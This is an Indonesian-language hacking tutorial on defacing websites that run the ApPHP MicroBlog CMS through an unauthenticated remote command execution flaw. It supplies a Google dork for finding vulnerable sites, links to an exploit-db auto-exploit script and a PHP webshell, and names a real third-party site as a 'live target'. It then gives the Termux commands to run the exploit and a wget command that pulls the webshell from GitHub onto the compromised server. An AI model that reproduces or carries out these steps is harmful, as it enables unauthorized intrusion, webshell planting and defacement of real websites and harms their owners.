Deface ApPHP MicroBlog - Unauthenticated Remote command execution


-

Hai sobat

Saya ikal,

Disini saya akan sharing - sharing sesuatu nih.

-


Sesuai judul kita kali ini, kita akan membahas sebuah exploit yang terdapat di sebuah CMS bernama apPHP MicroBlog. Exploit nya sendiri ada banyak :D, namun kita ambil yang ez for upload shell saja, salah satunya adalah Remote Command Execution (RCE).


Okeh kita langsung masuk saja kedalam inti pembahasan ini/Tahap Exploitasi.


Bahan : 

- Google Dork : "ApPHP" + "Admin Login"

- Webshell : https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/php/mini.php

- Tools auto exploit : https://www.exploit-db.com/download/33070

- Termux/Terminal lainnya


Pertama tama kalian cari target dulu untuk di eksekusi, disini saya sudah punya live target yah, jadi saya cantumkan saja.


Live target : 

http://www.richcrail.com/blog/index.php


Nah itu live target saya :D, Pertama tama kita download dulu tools auto exploit nya dengan mengklik saja link yang di cantumkan di atas, maka file otomatis akan terdownload kedalam device kalian.


Lanjut kita buka termux dan ketikan syntax berikut : 


$ cd /sdcard && cd Download

 

Lalu kita install python2 untuk menjalankan toolsnya. Ketikan syntax ini ke termux kalian : 


$ pkg install python2 -y


 Nah, sekarang kita tinggal jalankan tools nya dengan ketikan syntax berikut ke termux kalian : 


$ python2 33070.py https://localhost/index.php

Atau 

$ python2 33070.py https://localhost/[path]/index.php

 

*Note : Ganti url localhost dengan target kalian masing - masing, beserta file /index.php


Contoh : 


$ python2 33070.py http://www.richcrail.com/blog/index.php

 

Tampilan exploitasi berhasil

Jika vuln Remote Command Execution, maka akan muncul kata ini


[*] Testing remote execution

[+] Remote exec is working with system() :)

Submit your commands, type exit to quit

>


Nah, jika tidak muncul > nya. Cari target lain saja :D. 


Selepas itu kita tinggal melakukan wget untuk mengupload shell, pasti udh tau dong command wget gimana :D.


wget https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/php/mini.php -O 0x33070.php


Dan kalian tinggal mengakses webshellnya dengan nama 0x33070.php. Contoh : 


https://localhost/0x33070.php

https://localhost/[path]/0x33070.php

 

Nah segini saja artikel kali ini, Jika ada yang kurang atau salah kata biarkan saja.


Thanks

See U